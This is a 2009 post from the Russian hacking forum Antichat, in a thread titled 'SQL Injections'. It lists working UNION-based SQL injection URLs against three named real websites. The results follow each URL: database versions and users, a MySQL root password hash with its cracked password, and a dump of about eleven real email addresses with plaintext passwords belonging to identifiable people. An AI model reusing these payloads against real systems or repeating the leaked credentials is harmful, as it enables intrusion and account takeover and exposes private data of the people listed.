ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 24.02.2009, 23:51
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
Цитата:
http://www.rinkfinder.com/arenas/view_arena.asp?ID=1687687368768762+union+select+1, 2,3,concat_ws(0x3a,version(),user(),database()),5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 7,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73, 74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90 ,91,92,93,94,95,96,97,98,99,100,101,102,103,104,10 5,106,107,108,109,110,111,112,113,114,115,116,117, 118,119,120,121,122,123,124,125,126,127,128,129,13 0,131,132,133,134,135,136,137,138--

Database Version: 5.0.45
Database name: rinkfinder
User name: testuser@209.240.73.210


Цитата:
http://www.rinkfinder.com/arenas/view_arena.asp?ID=1687687368768762+union+select+1, 2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61, 62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78 ,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,9 5,96,97,98,99,100,101,102,103,104,105,106,107,108, 109,110,111,112,113,114,115,116,117,118,119,120,12 1,122,123,124,125,126,127,128,129,130,131,132,133, 134,135,136,137,138+from+mysql.user+limit+0,1--
root : 304c680c7bea9e43 хэш MySQL : 304c680c7bea9e43 : trainwreck


На Винде 2003

2ip показал 161 сайт.




Цитата:
http://www.lautrecampagne.org/article.php?id=0137986542+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,concat_ws(0x3a,version(),user() ,database()),15,16,17,18,19,20,21,22,23,24--


Database Version: 5.0.68-log
Database name: lautrecafmyBd
User name: lautrecafmyBd@10.0.85.131


Цитата:
http://www.lautrecampagne.org/article.php?id=0137986542+UNION+SELECT+1,2,3,4,5,6 ,7,8,9,10,11,12,13,CONCAT(0x3a,(SELECT+CONCAT(user Email,0x3a,userMdp)+FROM+lautrecafmyBd.tacusers+LI MIT+1,1),0x3a),15,16,17,18,19,20,21,22,23,24--

:f.bourgade@free.fr :fb
assant.ordinaire@wanadoo.fr :jmoqtw56
:le_strat@eaudeparis.fr :bghlnrsv
:immanuel.wallerstein@yale.edu :cgkx3578
:julie@avenuebprod.com :df7frt2p
:gdebregeas@gmail.com :cefhkrs7
:susangeorge@free.fr :blostxz1
:chemgen@ext.jussieu.fr :deguvz17
:etienne.balibar@wanadoo.fr:uytz9lh3
:bouveres@noos.fr :ghuvyz37
:mgaillenikodimov@yahoo.fr :eqrvxz56




ГРУППЫ КОДЕРОВ НА ПХП-))


PageRank = 6


Цитата:
http://www.phpusergroups.org/groups.phtml?id=179879865398072+union+select+conca t_ws(0x3a,version(),user(),database()),2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17--&menu=groups

Database Version: 5.0.18-standard
Database name: phpuserg
User name: phpuserg@localhost
Последний раз редактировалось spherics; 25.02.2009 в 00:40..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ